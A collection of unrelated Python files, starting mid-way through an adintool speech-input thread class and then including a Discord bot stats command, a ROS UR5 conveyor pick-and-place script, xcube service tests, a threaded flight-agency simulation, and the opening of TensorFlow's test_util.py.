self.proc_seq = 0
def __del__(self, ):
qLog.log('info', self.proc_id, 'bye!', display=self.logDisp, )
def begin(self, ):
#qLog.log('info', self.proc_id, 'start')
self.fileRun = qPath_work + self.proc_id + '.run'
self.fileRdy = qPath_work + self.proc_id + '.rdy'
self.fileBsy = qPath_work + self.proc_id + '.bsy'
qFunc.statusSet(self.fileRun, False)
qFunc.statusSet(self.fileRdy, False)
qFunc.statusSet(self.fileBsy, False)
self.proc_s = queue.Queue()
self.proc_r = queue.Queue()
self.proc_main = threading.Thread(target=self.main_proc, args=(self.proc_s, self.proc_r, ))
self.proc_beat = time.time()
self.proc_last = time.time()
self.proc_step = '0'
self.proc_seq = 0
self.proc_main.setDaemon(True)
self.proc_main.start()
def abort(self, waitMax=5, ):
qLog.log('info', self.proc_id, 'stop', display=self.logDisp, )
self.breakFlag.set()
chktime = time.time()
while (not self.proc_beat is None) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
chktime = time.time()
while (os.path.exists(self.fileRun)) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
def put(self, data, ):
self.proc_s.put(data)
return True
def checkGet(self, waitMax=5, ):
chktime = time.time()
while (self.proc_r.qsize() == 0) and ((time.time() - chktime) < waitMax):
time.sleep(0.10)
data = self.get()
return data
def get(self, ):
if (self.proc_r.qsize() == 0):
return ['', '']
data = self.proc_r.get()
self.proc_r.task_done()
return data
def main_proc(self, cn_r, cn_s, ):
# ログ
qLog.log('info', self.proc_id, 'start', display=self.logDisp, )
qFunc.statusSet(self.fileRun, True)
self.proc_beat = time.time()
# 初期設定
self.proc_step = '1'
adin_rewind = '555'
adin_headmg = '333'
adin_tailmg = '444'
vadLevel = '1'
if (self.micLevel == '1'):
vadLevel = '3'
adintool_exe = None
adintool_gui = None
# ガイド音
if (self.micGuide != 'off'):
qFunc.guideSound('_up')
# 待機ループ
self.proc_step = '5'
while (self.proc_step == '5'):
self.proc_beat = time.time()
# 停止要求確認
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
# キュー取得
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
inp_name = cn_r_get[0]
inp_value = cn_r_get[1]
cn_r.task_done()
else:
inp_name = ''
inp_value = ''
if (cn_r.qsize() > 1) or (cn_s.qsize() > 20):
qLog.log('warning', self.proc_id, 'queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
# レディ設定
if (qFunc.statusCheck(self.fileRdy) == False):
qFunc.statusSet(self.fileRdy, True)
# ステータス応答
if (inp_name.lower() == '_status_'):
out_name = inp_name
out_value = '!ready'
if (not adintool_exe is None):
files = glob.glob(self.path + '*')
if (len(files) == 0):
out_value = '_ready_'
else:
out_value = '_busy_'
cn_s.put([out_name, out_value])
# 処理
# on ?
sw = 'off'
if (qFunc.statusCheck(qBusy_dev_mic) == False):
if (self.micDev.isdigit()):
if (self.micType == 'usb'):
sw = 'on'
else:
if (qFunc.statusWait_false(qBusy_s_ctrl, 1) == False) \
and (qFunc.statusWait_false(qBusy_s_wav, 1) == False) \
and (qFunc.statusWait_false(qBusy_s_STT, 1) == False) \
and (qFunc.statusWait_false(qBusy_s_TTS, 1) == False) \
and (qFunc.statusWait_false(qBusy_s_TRA, 1) == False) \
and (qFunc.statusWait_false(qBusy_s_play, 1) == False):
sw = 'on'
# off -> on
if (sw == 'on'):
if (adintool_exe is None):
# 実行カウンタ
self.proc_last = time.time()
self.proc_seq += 1
if (self.proc_seq > 9999):
self.proc_seq = 1
# ビジー設定 (ready)
if (qFunc.statusCheck(self.fileBsy) == False):
qFunc.statusSet(self.fileBsy, True)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_inp, True)
# ガイド音
if (self.micGuide == 'on' or self.micGuide == 'sound') \
or (qFunc.statusCheck(qRdy__s_force) == True):
qFunc.guideSound('_ready')
if (True):
nowTime = datetime.datetime.now()
filename = self.path + nowTime.strftime('%Y%m%d.%H%M%S') +'.adintool'
adintool_exe = subprocess.Popen(['adintool', '-in', 'mic', \
'-rewind', adin_rewind, '-headmargin', adin_headmg, '-tailmargin', adin_tailmg, \
'-fvad', vadLevel, '-lv', self.micLevel, \
'-out', 'file', '-filename', filename, '-startid', '5001', ] , \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
if (adintool_gui is None) and (os.name == 'nt'):
if (self.micGuide == 'on') or (self.micGuide == 'display') \
or (qFunc.statusCheck(qRdy__s_force) == True):
adintool_gui = subprocess.Popen(['adintool-gui', '-in', 'mic', \
'-rewind', adin_rewind, '-headmargin', adin_headmg, '-tailmargin', adin_tailmg, \
'-lv', self.micLevel,] , \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
# フォース 終了
if (not adintool_gui is None):
if (self.micGuide != 'on') and (self.micGuide != 'display') \
and (qFunc.statusCheck(qRdy__s_force) != True):
adintool_gui.terminate()
adintool_gui = None
# off, accept ?
sw = 'on'
if (qFunc.statusCheck(qBusy_dev_mic) == True):
sw = 'off'
if (self.micType == 'bluetooth'):
if (qFunc.statusCheck(qBusy_s_play) == True):
sw = 'off'
if (not adintool_exe is None):
files = glob.glob(self.path + '*')
if (len(files) > 0):
chktime = time.time()
while (len(files) > 0) and ((time.time() - chktime) < 2):
time.sleep(0.20)
files = glob.glob(self.path + '*')
if (len(files) == 0):
sw = 'accept'
# on -> off, accept
if (sw == 'off') or (sw == 'accept'):
# adintool 終了
if (not adintool_gui is None):
adintool_gui.terminate()
adintool_gui = None
if (self.micType == 'bluetooth'):
# adintool 終了
if (not adintool_exe is None):
adintool_exe.terminate()
adintool_exe = None
# ビジー解除 (!ready)
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_inp, False)
# ガイド音
time.sleep(0.50)
if (sw == 'accept'):
if (self.micGuide == 'on') or (self.micGuide == 'sound') \
or (qFunc.statusCheck(qRdy__s_force) == True):
qFunc.guideSound('_accept')
# フォース 終了
if (qFunc.statusCheck(qRdy__s_force) == True):
qFunc.statusSet(qRdy__s_force, False)
time.sleep(0.50)
# アイドリング
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
elif (qFunc.statusCheck(qBusy_dev_mic) == True) \
and (qFunc.statusCheck(qRdy__s_force) == False) \
and (qFunc.statusCheck(qRdy__s_sendkey) == False):
slow = True
if (slow == True):
time.sleep(1.00)
else:
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.05)
# 終了処理
if (True):
# レディ解除
qFunc.statusSet(self.fileRdy, False)
# adintool 終了
if (not adintool_gui is None):
adintool_gui.terminate()
adintool_gui = None
if (not adintool_exe is None):
adintool_exe.terminate()
adintool_exe = None
# ビジー解除 (!ready)
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_inp, False)
# ガイド音
if (self.micGuide != 'off'):
qFunc.guideSound('_down')
# キュー削除
while (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
cn_r.task_done()
while (cn_s.qsize() > 0):
cn_s_get = cn_s.get()
cn_s.task_done()
# ログ
qLog.log('info', self.proc_id, 'end', display=self.logDisp, )
qFunc.statusSet(self.fileRun, False)
self.proc_beat = None
if __name__ == '__main__':
# 共通クラス
qFunc.init()
# ログ
nowTime = datetime.datetime.now()
filename = qPath_log + nowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qLog.init(mode='logger', filename=filename, )
# 初期設定
qFunc.remove(qCtrl_control_speech)
qFunc.statusReset_speech(False)
qFunc.kill('adintool')
qFunc.kill('adintool-gui')
# パラメータ
runMode = 'debug'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
# 開始
adintool_thread = proc_adintool('adintool', '0', runMode, )
adintool_thread.begin()
# テスト実行
if (len(sys.argv) < 2):
chktime = time.time()
while ((time.time() - chktime) < 15):
res_data = adintool_thread.get()
res_name = res_data[0]
res_value = res_data[1]
if (res_name != ''):
print(res_name, res_value, )
if (adintool_thread.proc_s.qsize() == 0):
adintool_thread.put(['_status_', ''])
time.sleep(0.05)
# 単体実行
if (len(sys.argv) >= 2):
# 待機ループ
while (True):
# 終了確認
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_speech)
if (txts != False):
qLog.log('info', str(txt))
if (txt == '_end_'):
break
else:
qFunc.remove(qCtrl_control_speech)
control = txt
# メッセージ
res_data = adintool_thread.get()
res_name = res_data[0]
res_value = res_data[1]
#if (res_name != ''):
# print(res_name, res_value, )
time.sleep(0.50)
# 終了
adintool_thread.abort()
del adintool_thread
qFunc.kill('adintool')
qFunc.kill('adintool-gui')
|
stats.py | from client import client
from datetime import datetime
import discord
import os
import socket
import threading
import time
try:
import psutil
except ModuleNotFoundError:
has_psutil = False
else:
has_psutil = True
cmd_name = "stats"
client.basic_help(title=cmd_name, desc=f"shows various running statistics of {client.bot_name}")
detailed_help = {
"Usage": f"{client.default_prefix}{cmd_name}",
"Description": f"This command shows different available statistics of {client.bot_name}, including servers, uptime, and commands run.",
"Related": f"`{client.default_prefix} info` - shows information about {client.bot_name}",
}
client.long_help(cmd=cmd_name, mapping=detailed_help)
@client.ready
async def readier():
def psutil_update_thread_loop(client):
while client.active:
# self_process.cpu_percent() # not sure how to optimize this loop in another thread so we're going to comment it out and deal with it for now
psutil.cpu_percent(percpu=True)
time.sleep(5)
global psutil_update_thread
psutil_update_thread = threading.Thread(target=psutil_update_thread_loop, name="PSUtil_Background_Loop", args=[client])
return
@client.command(trigger=cmd_name, aliases=["statistics", "s"])
async def statistics(command: str, message: discord.Message):
if "--hostname" in command:
include_hostname = True
else:
include_hostname = False
if "--uptime" in command:
up = time.perf_counter() - client.first_execution
await message.channel.send(f"Uptime:\n`{up:.3f}` seconds\n`{up/86400:.4f}` days")
return
async with message.channel.typing():
if has_psutil:
try:
temp = psutil.sensors_temperatures()['cpu-thermal'][0].current
except (AttributeError, KeyError):
temp = None
self = psutil.Process()
cpu_self = self.cpu_percent(interval=1)
self_m_used = self.memory_info().rss
m_raw = psutil.virtual_memory()
m_total = m_raw.total
m_available = m_raw.available
m_used = m_total - m_available
cpu = psutil.cpu_percent(percpu=True)
index = 0
cpu_text = ""
for v in cpu:
cpu_text += f"**CPU {index}:** {v}%\n"
index += 1
embed = discord.Embed(title=f"{client.bot_name} stats", description=discord.Embed.Empty, color=0x404040)
up = time.perf_counter() - client.first_execution
embed = embed.add_field(name="Uptime", value=f"{up:.3f} seconds\n{up/86400:.4f} days")
embed = embed.add_field(name="Servers", value=len(client.guilds))
embed = embed.add_field(name="Total commands run in all servers since last reboot", value=client.command_count, inline=False)
mps = client.message_count / up
msg_freq = up / client.message_count
embed = embed.add_field(name="Total messages sent in all servers since last reboot", value=f"{client.message_count} ({mps:.4f}/sec) ({msg_freq:.4f} sec/message)", inline=False)
n_connected = len(client.voice_clients)
n_playing = len([x for x in client.voice_clients if x.is_playing()])
embed = embed.add_field(name="Connected voice chats", value=f"{n_connected} ({n_playing} playing)")
embed = embed.add_field(name="Bot Process ID", value=os.getpid())
if include_hostname: embed = embed.add_field(name="Host Machine Name", value=socket.gethostname())
if has_psutil:
embed = embed.add_field(name="Host CPU temperature", value=f"{int(temp) if temp is not None else 'Unknown'}")
embed = embed.add_field(name="Process Memory Usage", value=f"{self_m_used/(1024*1024):.3f} MiB")
embed = embed.add_field(name="Process CPU Usage (relative to one core)", value=f"{cpu_self:.1f}%")
embed = embed.add_field(name="System RAM Usage", value=f"{m_used/(1024*1024):.1f}/{m_total/(1024*1024):.1f} MiB ({(m_used/m_total)*100:.2f}%)")
embed = embed.add_field(name="System CPU Usage", value=cpu_text, inline=False)
embed = embed.set_footer(text=datetime.utcnow().__str__())
await message.channel.send(embed=embed)
|
pick_and_place_with_conveyor.py | #! /usr/bin/env python
'''
Controls a UR5 Robotic Arm to sort coloured boxes into bins from a conveyor.
'''
import rospy, geometry_msgs.msg, os, threading
from hrwros_gazebo.msg import LogicalCameraImage
from math import radians
from rospy.exceptions import ROSInterruptException
from lib import UR5MoveIt
Package_Pos = 0 # Stores the conveyor position of the detected box
MasterString = '' # String to store models' names from camera_callback()
Stop_var = False # Start-stop variable
def env_data():
'''
Data of all environment-specific parameters:
1. Vacuum Gripper Width
2. Box Size
Returns:
All environment-specific data.
'''
box_length = 0.15 # Length of the box
vacuum_gripper_width = 0.117 # Vacuum Gripper Width
# Return data when called
return [box_length,
vacuum_gripper_width]
def joint_angles_data():
'''
Data of all joint angles required for various known positions:
1. Home: Ready-position for picking objects off the conveyor
2. Red Bin: Red Bin to place Red packages
3. Green Bin: Green Bin to place Green packages
4. Blue Bin: Blue Bin to place Blue packages
Returns:
Joint angles for all positions when called.
'''
# Home/Ready angles for picking
home_joint_angles = [radians(180),
radians(-75),
radians(110),
radians(-125),
radians(-90),
radians(0)]
# Red Bin angles
red_bin_joint_angles = [radians(65),
radians(-55),
radians(80),
radians(-115),
radians(-90),
radians(0)]
# Green bin angles
green_bin_joint_angles = [radians(0),
radians(-55),
radians(80),
radians(-115),
radians(-90),
radians(0)]
# Blue bin angles
blue_bin_joint_angles = [radians(-95),
radians(-55),
radians(80),
radians(-115),
radians(-90),
radians(0)]
# Return data when called
return [home_joint_angles,
red_bin_joint_angles,
green_bin_joint_angles,
blue_bin_joint_angles]
def smart_stop():
'''
Multithreaded function for conveyor start-stop.
The conveyor will first move at full speed until the first package is detected, then it will move at normal speed.
'''
global MasterString, Package_Pos, Stop_var
counter = 0
while(True):
if('packagen1' in MasterString or 'packagen2' in MasterString or 'packagen3' in MasterString) and (Package_Pos < 0.2):
os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 0"')
Stop_var = True
else:
if(counter == 0): # Until a package is detected, the conveyor will move at full speed
os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 100"')
counter = 1
os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 30"')
def camera_callback(msg_camera):
'''
Callback function for Conveyor Logical Camera Subscriber
Parameters:
msg_camera (LogicalCameraImage): Data about all the objects detected by the Logical Camera.
'''
global MasterString, Package_Pos
if(msg_camera.models != []):
if len(msg_camera.models) == 1:
MasterString = msg_camera.models[0].type
Package_Pos = msg_camera.models[0].pose.position.y
else:
MasterString = msg_camera.models[1].type
Package_Pos = msg_camera.models[1].pose.position.y
def pose_set(trans, rot):
'''
Assigns pose values w.r.t the world-frame to a PoseStamped object.
Parameters:
trans (float[]): Translation Values.
rot (float[]): RPY Rotation Values.
Returns:
pose (geometry_msgs.msg.PoseStamped() object): The complete pose with values.
'''
# If you want to override any values, use this
override = [trans, [-0.5, -0.5, 0.5, 0.5]]
if(override != []):
trans = override[0]
rot = override[1]
print(override)
pose = geometry_msgs.msg.PoseStamped()
pose.header.frame_id = 'world'
pose.pose.position.x = trans[0]
pose.pose.position.y = trans[1]
pose.pose.position.z = trans[2]
pose.pose.orientation.x = rot[0]
pose.pose.orientation.y = rot[1]
pose.pose.orientation.z = rot[2]
pose.pose.orientation.w = rot[3]
return pose
def box_plan(box_name, box_length, vacuum_gripper_width):
'''
Pick-planning for the boxes.
Parameters:
box_name (str): The colour of the box detected.
box_length (float): The size of the box.
vacuum_gripper_width (float): The width of the vacuum gripper.
'''
# Offset for end effector placement
delta = vacuum_gripper_width + (box_length/2)
try:
if(box_name == 'R'): # Red box detected
# Obtaining the TF transform of the box
(box_trans, box_rot) = ur5.tf_listener.lookupTransform("/world",
"/logical_camera_2_packagen1_frame",
rospy.Time(0))
# Execute pick operation
box_pose = pose_set(box_trans, box_rot) # Collating pose values
box_pose.pose.position.z = box_pose.pose.position.z + delta # Adding Z Offset
ur5.go_to_pose(box_pose)
# Activate Vacuum Gripper
os.system(
'rosservice call /eyrc/vb/ur5_1/activate_vacuum_gripper "activate_vacuum_gripper: true"\n')
# Add the Red box to the planning scene
box_pose.pose.position.z = box_pose.pose.position.z - delta # Removing Z Offset
ur5.add_box(box_name, box_length, box_pose)
ur5.attach_box(box_name)
# Log the operation
rospy.loginfo(
'\033[91m' + "Red Package Picked!" + '\033[0m')
elif(box_name == 'G'): # Green box detected
(box_trans, box_rot) = ur5.tf_listener.lookupTransform("/world",
"/logical_camera_2_packagen2_frame",
rospy.Time(0))
box_pose = pose_set(box_trans, box_rot)
box_pose.pose.position.z = box_pose.pose.position.z + delta
ur5.go_to_pose(box_pose)
os.system(
'rosservice call /eyrc/vb/ur5_1/activate_vacuum_gripper "activate_vacuum_gripper: true"\n')
box_pose.pose.position.z = box_pose.pose.position.z - delta
ur5.add_box(box_name, box_length, box_pose)
ur5.attach_box(box_name)
rospy.loginfo(
'\033[92m' + "Green Package Picked!" + '\033[0m')
elif(box_name == 'B'): # Blue box detected
(box_trans, box_rot) = ur5.tf_listener.lookupTransform("/world",
"/logical_camera_2_packagen3_frame",
rospy.Time(0))
box_pose = pose_set(box_trans, box_rot)
box_pose.pose.position.z = box_pose.pose.position.z + delta
ur5.go_to_pose(box_pose)
os.system(
'rosservice call /eyrc/vb/ur5_1/activate_vacuum_gripper "activate_vacuum_gripper: true"\n')
box_pose.pose.position.z = box_pose.pose.position.z - delta
ur5.add_box(box_name, box_length, box_pose)
ur5.attach_box(box_name)
rospy.loginfo(
'\033[94m' + "Blue Package Picked!" + '\033[0m')
except:
return
def bin_plan(bin_name, bin_joint_angles):
'''
Place-planning for the bins.
Parameters:
bin_name (str): The colour of the bin.
bin_joint_angles (float[]): The joint anglenv_values[0], env_values[1]es of the required bin.
'''
if(bin_name == 'R'): # Red bin
# Set joint angles for the bin
ur5.set_joint_angles(bin_joint_angles)
# Deactivate the Gripper
os.system(
'rosservice call /eyrc/vb/ur5_1/activate_vacuum_gripper "activate_vacuum_gripper: false"\n')
# Remove the box from the planning scene
ur5.detach_box(bin_name)
ur5.remove_box(bin_name)
# Log the operation
rospy.loginfo(
'\033[91m' + "Red Package Placed!" + '\033[0m')
elif(bin_name == 'G'): # Green bin
ur5.set_joint_angles(bin_joint_angles)
os.system(
'rosservice call /eyrc/vb/ur5_1/activate_vacuum_gripper "activate_vacuum_gripper: false"\n')
ur5.detach_box(bin_name)
ur5.remove_box(bin_name)
rospy.loginfo(
'\033[92m' + "Green Package Placed!" + '\033[0m')
elif(bin_name == 'B'): # Blue bin
ur5.set_joint_angles(bin_joint_angles)
os.system(
'rosservice call /eyrc/vb/ur5_1/activate_vacuum_gripper "activate_vacuum_gripper: false"\n')
ur5.detach_box(bin_name)
ur5.remove_box(bin_name)
rospy.loginfo(
'\033[94m' + "Blue Package Placed!" + '\033[0m')
def subscriber_init():
'''
Definitions and setups of all Subscribers.
'''
# Subscriber for Conveyor Logical Camera
rospy.Subscriber('/eyrc/vb/logical_camera_2',
LogicalCameraImage,
camera_callback)
def controller():
'''
Executes the main operations.
'''
global MasterString, Stop_var
# Go to a home position in preparation for picking up the packages
ur5.set_joint_angles(joint_angles[0])
# Execute box-bin planning
while(not rospy.is_shutdown()):
try:
if('packagen1' in MasterString) and Stop_var: # Red box
box_plan('R', env_values[0], env_values[1]) # Pick operation
bin_plan('R', joint_angles[1]) # Place operation
Stop_var = False
elif('packagen2' in MasterString) and Stop_var: # Green box
box_plan('G', env_values[0], env_values[1])
bin_plan('G', joint_angles[2])
Stop_var = False
elif('packagen3' in MasterString) and Stop_var: # Blue box
box_plan('B', env_values[0], env_values[1])
bin_plan('B', joint_angles[3])
Stop_var = False
else:
ur5.set_joint_angles(joint_angles[0])
except rospy.ROSInterruptException:
# Erase thread after execution
t.join()
if __name__ == '__main__':
'''
Controls overall execution.
'''
ur5 = UR5MoveIt()
# Start the Subscribers
subscriber_init()
# Start the separate conveyor control thread
t = threading.Thread(target=smart_stop)
t.start()
# Obtain prerequisite data
joint_angles = joint_angles_data()
env_values = env_data()
# Start execution
controller()
|
test_service.py | import re
import unittest
from xcube.webapi.service import Service
from xcube.webapi.service import new_default_config
from xcube.webapi.service import url_pattern
class ServerMock:
def stop(self):
pass
class ApplicationMock:
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def listen(self, port: int, address: str = "", **kwargs):
return ServerMock()
class ServiceTest(unittest.TestCase):
def test_service_ok(self):
application = ApplicationMock()
# noinspection PyTypeChecker
service = Service(application)
self.assertIs(application, service.application)
self.assertTrue(hasattr(service.application, 'service_context'))
self.assertTrue(hasattr(service.application, 'time_of_last_activity'))
def test_service_deprecated(self):
application = ApplicationMock()
# noinspection PyTypeChecker
service = Service(application,
log_to_stderr=True,
log_file_prefix='log-')
self.assertIs(application, service.application)
def test_service_kwarg_validation(self):
application = ApplicationMock()
for k, v in dict(cube_paths=['test.zarr'],
styles=dict(a=2),
aws_prof='test',
aws_env=True).items():
with self.assertRaises(ValueError) as cm:
# noinspection PyTypeChecker
Service(application,
config_file='server-conf.yaml',
**{k: v})
self.assertEqual(f'config_file and {k} cannot be given both',
f'{cm.exception}')
def test_start_and_stop(self):
application = ApplicationMock()
# noinspection PyTypeChecker
service = Service(application)
import threading
# Test service.start()
thread = threading.Thread(target=service.start)
thread.start()
thread.join(timeout=0.1)
self.assertIsInstance(service.server, ServerMock)
# Test stop.stop()
thread = threading.Thread(target=service.stop)
thread.start()
thread.join(timeout=0.1)
# Test stop._on_shutdown()
thread = threading.Thread(target=service._on_shutdown)
thread.start()
thread.join(timeout=0.1)
self.assertIsNone(service.server)
class DefaultConfigTest(unittest.TestCase):
def test_new_default_config(self):
config = new_default_config(["/home/bibo/data/cube-1.zarr",
"/home/bibo/data/cube-2.nc"],
dict(conc_chl=(0.0, 20.0),
conc_tsm=(0.0, 12.0, 'plasma')))
self.assertEqual({
'Datasets': [
{
'FileSystem': 'file',
'Format': 'zarr',
'Identifier': 'dataset_1',
'Path': '/home/bibo/data/cube-1.zarr',
'Title': 'cube-1.zarr'
},
{
'FileSystem': 'file',
'Format': 'netcdf4',
'Identifier': 'dataset_2',
'Path': '/home/bibo/data/cube-2.nc',
'Title': 'cube-2.nc'
}
],
'Styles': [
{'Identifier': 'default',
'ColorMappings': {
'conc_chl': {'ValueRange': [0.0, 20.0]},
'conc_tsm': {'ColorBar': 'plasma',
'ValueRange': [0.0, 12.0]}},
}
]},
config)
with self.assertRaises(ValueError) as cm:
new_default_config(["/home/bibo/data/cube-1.zarr",
"/home/bibo/data/cube-2.nc"],
dict(conc_chl=20.0,
conc_tsm=(0.0, 12.0, 'plasma')))
self.assertEqual("illegal style: conc_chl=20.0", f"{cm.exception}")
class UrlPatternTest(unittest.TestCase):
def test_url_pattern_works(self):
re_pattern = url_pattern('/open/{{id1}}ws/{{id2}}wf')
matcher = re.fullmatch(re_pattern, '/open/34ws/a66wf')
self.assertIsNotNone(matcher)
self.assertEqual(matcher.groupdict(), {'id1': '34', 'id2': 'a66'})
re_pattern = url_pattern('/open/ws{{id1}}/wf{{id2}}')
matcher = re.fullmatch(re_pattern, '/open/ws34/wfa66')
self.assertIsNotNone(matcher)
self.assertEqual(matcher.groupdict(), {'id1': '34', 'id2': 'a66'})
re_pattern = url_pattern('/datasets/{{ds_id}}/data.zarr/(?P<path>.*)')
matcher = re.fullmatch(re_pattern, '/datasets/S2PLUS_2017/data.zarr/')
self.assertIsNotNone(matcher)
self.assertEqual(matcher.groupdict(), {'ds_id': 'S2PLUS_2017', 'path': ''})
matcher = re.fullmatch(re_pattern, '/datasets/S2PLUS_2017/data.zarr/conc_chl/.zattrs')
self.assertIsNotNone(matcher)
self.assertEqual(matcher.groupdict(), {'ds_id': 'S2PLUS_2017', 'path': 'conc_chl/.zattrs'})
x = 'C%3A%5CUsers%5CNorman%5CIdeaProjects%5Cccitools%5Cect-core%5Ctest%5Cui%5CTEST_WS_3'
re_pattern = url_pattern('/ws/{{base_dir}}/res/{{res_name}}/add')
matcher = re.fullmatch(re_pattern, '/ws/%s/res/SST/add' % x)
self.assertIsNotNone(matcher)
self.assertEqual(matcher.groupdict(), {'base_dir': x, 'res_name': 'SST'})
def test_url_pattern_ok(self):
self.assertEqual('/version',
url_pattern('/version'))
self.assertEqual(r'(?P<num>[^\;\/\?\:\@\&\=\+\$\,]+)/get',
url_pattern('{{num}}/get'))
self.assertEqual(r'/open/(?P<ws_name>[^\;\/\?\:\@\&\=\+\$\,]+)',
url_pattern('/open/{{ws_name}}'))
self.assertEqual(r'/open/ws(?P<id1>[^\;\/\?\:\@\&\=\+\$\,]+)/wf(?P<id2>[^\;\/\?\:\@\&\=\+\$\,]+)',
url_pattern('/open/ws{{id1}}/wf{{id2}}'))
self.assertEqual(r'/datasets/(?P<ds_id>[^\;\/\?\:\@\&\=\+\$\,]+)/data.zip/(.*)',
url_pattern('/datasets/{{ds_id}}/data.zip/(.*)'))
def test_url_pattern_fail(self):
with self.assertRaises(ValueError) as cm:
url_pattern('/open/{{ws/name}}')
self.assertEqual(str(cm.exception), 'name in {{name}} must be a valid identifier, but got "ws/name"')
with self.assertRaises(ValueError) as cm:
url_pattern('/info/{{id}')
self.assertEqual(str(cm.exception), 'no matching "}}" after "{{" in "/info/{{id}"')
|
main.py | from threading import RLock, Thread #RLock usado en caso de usar .acquiare por segunda vez desde el mismo hilo
from time import sleep
# Modulos propios ->Carpeta modulo
from modulos.agencia import agencia
from modulos.compania import compania
from modulos.cliente import cliente
if __name__ == "__main__":
numClientes=4
lock = RLock()
lock.acquire()
lock.release()
hilosList = []
clienteList = []
companiaList = []
agenciaList = []
#Compañias de vuelo
aereomar = compania('Aeromar')
aereomexico = compania('Aereomexico')
interjet = compania('InterJet')
volaris = compania('volaris')
companiaList = [aereomar,aereomexico,interjet,volaris]
#Agencias de vuelo
coppel = agencia(companiaList,'coppelViajes',numClientes)
despegar = agencia(companiaList, 'despegar.com',numClientes)
mundo = agencia(companiaList, "mundomex",numClientes)
best = agencia(companiaList, 'bestday',numClientes)
palacio = agencia(companiaList, 'viajesPalacio',numClientes)
agenciaList = [coppel,despegar,mundo,best,palacio]
for agencias in agenciaList:
agencias.run()
sleep(2)
# creando clientes y corriendo los hilos correspondientes
for i in range(numClientes):
clienteList.append( cliente(agenciaList))
hilosList.append(Thread(target=clienteList[i].run).start())
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_sanitizers
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import tfrt_utils
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import _pywrap_stacktrace_handler
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import _pywrap_util_port
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util import traceback_utils
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable/disable MLIR
# compilation.
def is_mlir_bridge_enabled():
return None
try:
from tensorflow.python.framework.is_mlir_bridge_test_false import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
pass
def is_asan_enabled():
"""Check if ASAN is enabled."""
return pywrap_sanitizers.is_asan_enabled()
def is_msan_enabled():
"""Check if MSAN is enabled."""
return pywrap_sanitizers.is_msan_enabled()
def is_tsan_enabled():
"""Check if TSAN is enabled."""
return pywrap_sanitizers.is_tsan_enabled()
